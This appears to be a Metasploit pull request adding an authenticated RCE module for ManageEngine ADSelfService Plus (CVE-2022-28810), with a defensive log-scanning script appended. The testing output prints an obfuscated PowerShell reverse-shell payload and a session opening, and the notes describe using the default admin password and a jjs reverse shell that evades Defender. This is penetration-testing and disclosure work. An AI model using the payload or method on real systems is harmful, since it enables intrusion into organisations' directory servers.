ManageEngine ADSelfService Plus Authenticated RCE (CVE-2022-28810) #16475
Conversation
Module is working great. The detailed setup steps were super helpful. I just left a few comments based on my review.
Testing Output
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. This determination is based on the version string: 6121.
[+] Authentication successful
[*] Requesting policy list from /ServletAPI/configuration/policyConfig/getPolicyConfigDetails
[*] Requesting policy details for msflab.local
[*] Payload: cmd.exe /c powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMAnX2ICA5VVXW8aORR951dcoelmRgEL0HbVRkq17DRdRcq2qJNtHhBSjOcSZmNs1vYEUMJ/rz3j+SAkausH'+'{1}PteHx+fe2wvcsFMJgX8jaZ/g3P{1}MxQ{1}Oo8dsC3YMDiHz7jpf5n/h8xA/3q3xs90hXbQEJs'+'fF/lVMvlX40dc0JybW{1}FqIxnl2kIERuVYZ02U3O7Isww7'+'3hqpcjv7zqKiu'+'JYbVLZn2UERn1BFV2H5PU2Mys{2}dLIjlakVF2jsc{2}{2}RnUjwb/Cg3gkuaFqORx1SSodbgBVjJNOfoCP4ZRlCmZAsIq2Wgj/9Dd56JtBsVwXJeMZdn2qBAZSdPk539Xh{1}nWiLZPRpNrtn6ymfMfrfteCLRhir'+'j1vUrF1FfovNW3pgxXBsLWJYjLKnsX6Or8A{1}VxmP{1}NXSr5C8xjyd+oe7w/YgM/3hHhm/fk+HoXbfnduKX75QSaqOQrhzfEp5YqyXFmOXZMCwrVBJ0bun6gr{2}oac2{2}CuwVhshylZkdSarU0K/'+'fCxbWVtgLH4'+'Nri76HPtUwPZjzFVfSYIzKZIuMUYPfKM9S6rwXU87nlN3PougFOmScm6Uzrps01q9qE4ic817XcD0cd{2}2hNl4t'+'VLPRtpL{2}+c7gdDYL3L+z5ICQ0cC2pzePg70X{1}0V'+'ahcOpwa0hKJhMnd/PzsZJfHkZuQL85XLC7o01rtxomLijlSyRc1C5EDYbrDy5tubtwi'+'kEKB7OXE+4o39qx2yl6gC{2}q3VumuCtiOV6p7K7pYEwjuCfjCmp5cJALNVaqkJRAmO'+'3mEvSoNBiP2BKbsWt8Lb0cpAbWxsMm431Br2mQ65Q3Jll20fVoW476chIv6bS9HQ{1}VxbSyeIvBFLz/HWu1axPUl1QtrScS1DIRH3hNFkNbdfCg3s6ItVuyyutQoqeLsWD'+'vMf+xXZttdVW7xpl37bUZplxDMMgK1xXbuIr0jQsPdaDQQ+CA/YR9AXC4EjSC6cfptdWy9eeDH9OXQopNL7wmjco9rRRR6WF5q+LYneVqBBk0bNq2sPpinm0b+hXV18JPvrw2'+'xCe4Etu+iUqePMcQI2gEKQCPoW{2}SQIn9r/Q/0qywsMRmVCzdNEPcNKAbB2RAJWSajqYHSzWYl3ECeNIVRi9xOC83bFHbds5NvBP+beB+aFj24Y98ms15xPP9bJ+Df3F4+/2mEuNfj/FcazeqLZhmocrMXJdvVb+1zqzfujr2vkX6zsNqLftrggAAA{0}{0}')-f'=','G','T')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Enabling custom scripts and inserting the payload
[*] Posting updated policy configuration to /ServletAPI/configuration/policyConfig/setAPCDetails
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.159.128:4444
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > [*] Powershell session session 3 opened (192.168.159.128:4444 -> 192.168.159.87:50092 ) at 2022-04-19 17:21:52 -0400
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) > sessions -i 3
[*] Starting interaction with 3...
PS C:\ManageEngine\ADSelfService Plus\bin> exit
[*] 192.168.159.87 - Powershell session session 3 closed. Reason: User exit
msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2022_28810) >
documentation/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810.md
modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb
Updated to address all comments. Thanks for that bit of JSON clean-up code, Spencer! That makes this a bit less sketchy 😄 Retested: And manually verified the custom scripts fields were reset.
Yay, a
Thanks for implementing those changes. I just retested the module and confirmed it's still working. Merged!
Release Notes
This adds an exploit for CVE-2022-28810, which is an authenticated RCE in ManageEngine ADSelfService Plus.
This is an implementation of an attack Rapid7 observed in the wild against ManageEngine ADSelfService Plus (ADSSP). Attackers were using ADSSP's "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords. The "custom script" logic can only be accessed by the admin user, but admin has a default password (admin) that isn't getting changed as often as you'd hope.

The "custom script" functionality that this module abuses was removed in build 6122 to address CVE-2022-28810. The vendor worded CVE-2022-28810 in such a way that it's unclear if they think the specific behavior this module abuses falls under the umbrella of CVE-2022-28810. But, since my name is associated with the CVE, I'm going to claim some type of authoritative knowledge and say, "Yes, fixing CVE-2022-28810 is in part about preventing arbitrary command execution using custom scripts."
Anyway. There are a few "interesting" things about this module, because isn't there always?
jjs is good
In the wild, the attacker was executing powershell to download stuff and whatever. Which is fine. But I thought this was a good opportunity to use jjs since ADSSP installs Java in tree and we always know where it is relative to our working directory. This was extra interesting because we didn't have a jjs reverse shell for Windows, and it is actually a good use for this vulnerability.

So this pull request also adds a reverse shell for Windows using jjs. It's almost entirely a copy and paste of @bcoles' work... to the point I didn't take any credit (there were a few minor tweaks but nothing to get all excited about). I enjoy jjs because the payload will execute "in memory" ish and Defender still seems not to give a hoot about it, so you never have to mess around with builtin Windows AV. I actually published my own jjs c2 a number of months before the cited links in the jjs_reverse_tcp.rb, but I'm sure others did too. Either way, jjs is good. I'm very happy to use jjs here.

There's always the argument that the module should drop meterpreter, but this is likely to be the more successful solution.
DisablePayloadHandler
This module sets DisablePayloadHandler to true and then starts its own payload handler (code which was stolen almost wholesale from windows/local/persistence.rb). This is a side effect of the module requiring user interaction to execute the payload. The module is set to passive so it can wait in the background, but it will simply exit after a brief timeout if using the default payload handler. Hence controlling its own handler is the solution.
TARGET_RESET
Exploitation leaves our payload in the custom script form, so I added an option that will simply clean up the target if the user specifies true. Again, due to the user interaction nature of this attack, there isn't a great time to clean everything up (it's not as simple as deleting a file), so I figured this was a reasonable solution. 🤷
Default port
By default this thing installs as HTTP on 8888. It can be configured to use HTTPS (9251 by default). I left the default port as 8888 with SSL set to false, but I think it's more likely that exploitable cases will be using HTTPS. Thoughts? Should I switch it over?
I've attached both video and pcap demonstrating exploitation. The video is worth a watch to understand what is happening, probably. The pcap should be useful for all of our signature writing friends (it's HTTP by default 😱). That's it.
Verification
List the steps needed to make sure this thing works:
1. msfconsole
2. set RHOST <ip>
3. set LHOST <ip>
4. check
5. run
6. set TARGET_RESET true
7. run
8. Scripts have been removed and disabled ("Configuration" -> "Self Service" -> "Policy Configuration" -> "Advanced" -> "Password Sync")
Video || GTFO
https://www.youtube.com/watch?v=eQxth9FUkJE
PCAP || GTFO
manageengine_adssp_reverse_shell.zip
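For the signature writers the pull request mentions, here is an added example (not part of the pull request or the module) that flags writes to the policy-configuration endpoint seen in the testing output and compares a reported build string against the fixed build 6122 named above. The log format and sample lines are constructed; the endpoint path, client address and build numbers come from this page.

```python
"""Flag ADSelfService Plus requests that rewrite the Password Sync policy.

Added example, not part of the pull request. Log lines are constructed in
combined log format; the real product's log layout may differ.
"""
import re
from dataclasses import dataclass

# Build in which the vendor removed the custom-script feature (per the PR text).
FIXED_BUILD = 6122

# Endpoint that writes the policy configuration, as seen in the module output.
POLICY_WRITE_PATH = "/ServletAPI/configuration/policyConfig/setAPCDetails"

# client - - [timestamp] "METHOD path PROTO" status size  (constructed format)
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Finding:
    client: str
    ts: str
    reason: str


def is_vulnerable_build(version_string: str) -> bool:
    """True when the reported build (e.g. '6121') predates the fix."""
    try:
        return int(version_string.strip()) < FIXED_BUILD
    except ValueError:
        return False  # unparseable version strings are not treated as vulnerable


def scan_access_log(lines, scheme="http"):
    """Return a Finding for every POST to the policy-write endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?")[0] == POLICY_WRITE_PATH:
            reason = "policy configuration written via setAPCDetails"
            if scheme == "http":
                reason += " (cleartext HTTP: request body recoverable from pcap)"
            findings.append(Finding(m["client"], m["ts"], reason))
    return findings


# Constructed sample log mirroring the request order in the testing output above.
SAMPLE_LOG = [
    '192.168.159.128 - - [19/Apr/2022:17:21:40 -0400] "POST /ServletAPI/configuration/policyConfig/getPolicyConfigDetails HTTP/1.1" 200 512',
    '192.168.159.128 - - [19/Apr/2022:17:21:41 -0400] "POST /ServletAPI/configuration/policyConfig/setAPCDetails HTTP/1.1" 200 64',
    '10.0.0.5 - - [19/Apr/2022:17:22:00 -0400] "GET / HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ts} {f.client}: {f.reason}")
```

Reads of getPolicyConfigDetails are left unflagged on purpose: only the write changes the custom-script fields, and pairing a write with a build below 6122 is the condition worth alerting on.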